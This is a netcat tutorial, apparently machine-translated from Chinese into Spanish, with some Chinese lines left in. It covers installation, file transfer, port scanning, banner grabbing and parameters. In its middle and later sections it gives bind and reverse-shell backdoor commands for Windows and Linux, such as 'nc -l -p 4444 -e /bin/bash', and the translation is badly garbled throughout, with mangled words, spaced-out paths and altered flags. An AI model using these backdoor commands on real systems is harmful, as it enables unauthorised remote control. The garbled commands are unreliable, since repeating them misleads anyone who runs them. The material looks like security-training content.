descarga centos7 nc:
wget https://sourceforge.net/projects/netcat/files/netcat/0.7.1/netcat-0.7.1.tar.gz
La extracción de alquitrán -zxvf netcat-0.7.1.tar.gz
cd / usr / local
mv netcat-0.7.1 netcat
cd / usr / local / netcat
./configure
Compilar maquillaje
Instalar make install
Configurar vim / etc / profile
Agregue la siguiente:
* # Set ruta netcat
exportación NETCAT_HOME = / opt / netcat
= Ruta de exportación NETCAT_HOME / bin
Guardar, salida, y la configuración tenga efecto:
source / etc / profile
prueba
nc éxito -help
conversión base64
en el terminal y de entrada de los base64 de entrada de valor se desea, convertir
base64
dangtianpeng
después pulse Intro para obtener ctrl + D
tcp base / protocolo IP (modelo C / S)
El servidor de datos a transmitir al cliente
Reenvío de información:
Creación de un método de servidor:
nc -l -p localPort
nc la -l (ip servidor: 1.1.1.1) -p 333
创建一个客户端方法(连接服务端)
nc [remote_addr] [remoteport]
nc -nv 1.1.1.1 333
Devuelve la cáscara de
la creación de un método de servidor:
nc el -p -l [localPort] -e cmd.exe
创建一个客户端方法(连接服务器端)
nc [remote_addr][remoteport]
la transmisión de datos nc, el uso de flujos de entrada y de salida estándar, se puede utilizar directamente la operación de línea de comandos.
El uso del método de transferencia de archivos:
crear un método en el servidor: (un servidor recibe un archivo)
NC -l -p [localPort]> outfile.txt
NC 333 -l -p> outfile.txt
crear un cliente (transferencia de archivos)
NC [REMOTE_ADDR ] [RemotePort] </root/Desktop/flag.txt
Si en este momento el servidor no estaba listo para conectar, y el cliente tiene que utilizar nc para conectar,
a continuación, el cliente esperará para siempre, sabiendo que se conectan al servidor, lo que resulta en una especie de "animación suspendida" estado de
solución: establece el tiempo de espera
nc -w3 [IP] [puerto] establece el tiempo de espera es de 3 segundos, 3 segundos más tarde, el cliente cierre la conexión
detección de información de netcat
- de exploración de red de destino
- la simple detección de un puerto de destino
- El rastreo de objetivos rótulo de servicio
Puerto escanear utilizando
NC -v -n el -Z -W1 [target_ip] [start_target_port-stop_target_port]
-v representación detallada de la salida de error
-n no diana resolución máquina DNS
-z cero I / O modo, dedicada a la exploración de puertos, representa datos IP enviados por la tabla de destino no contiene ninguna carga,
la velocidad se pueden acelerar este modo de exploración
de tiempo de espera -w1 1 segundo
bandera抓取
echo "" | nc -v -n -W1 [target_ip] [start_target_port-stop_target_port]
Comandos de destino de adquisición de permisos de ejecución
ventana estableció método de puerta trasera:
- puerta trasera tipo de monitor
nc -l -p 4444 -e cmd.exe - Backdoor tipo de conexión
nc [remote_ip] [remote_port] -e cmd.exe
El método de establecer Linux puerta trasera
1. puerta trasera tipo de monitor:
NC -l -p 4444 -e / bin / bash
2. puerta trasera tipo de conexión
nc [remote_ip] [remote_port] -e / bin / bash
parámetros del mandato
Ver comando de parámetro -h
desde la ventana de comandos, ejecute en segundo plano -d
ejecutar un programa, creado -e puerta trasera
fija la puerta de entrada, que se utiliza en la red -G límite de avance
de enrutamiento saltos -g
configurar cada fila de datos de intervalo -i
netcat conjunto en un estado de escucha a la espera de la conexión -l
netcat conjunto en la escucha de espera de estado para una conexión, cuando el cliente abre, el servidor vuelve al estado de espera -L
conjunto netcat sólo para identificar la dirección IP, la resolución de DNS -n ya no
establezca la transferencia hexadecimal -o datos
establecen número local puerto de escucha -p
proporcionado netcat número de puerto aleatorio -r
proporciona -s dirección de origen netcat
solicitud de respuesta de paquetes -t telnet
proporcionado utilizando netcat -u modo (modo por defecto netcat TCP) UDP
pantallas -v mensaje de error
proporcionado conectado con el tiempo de espera en segundos -w
establecer el modo de exploración, de datos que representa el paquete transmitido no contiene carga útil -z
reenvío de conexión
es romper el límite de conexión en ciertas circunstancias especiales, para hacer frente a algunos casos especiales
de eco nc [destino] [puerto]> delay.bat
nc -l -p [localPort] -e delay.bat
cuando la conexión del cliente con el servicio cuando el extremo, conexiones de cliente y la conexión con el servidor de destino a través de la función de reenvío de puertos para lograr una conexión. ()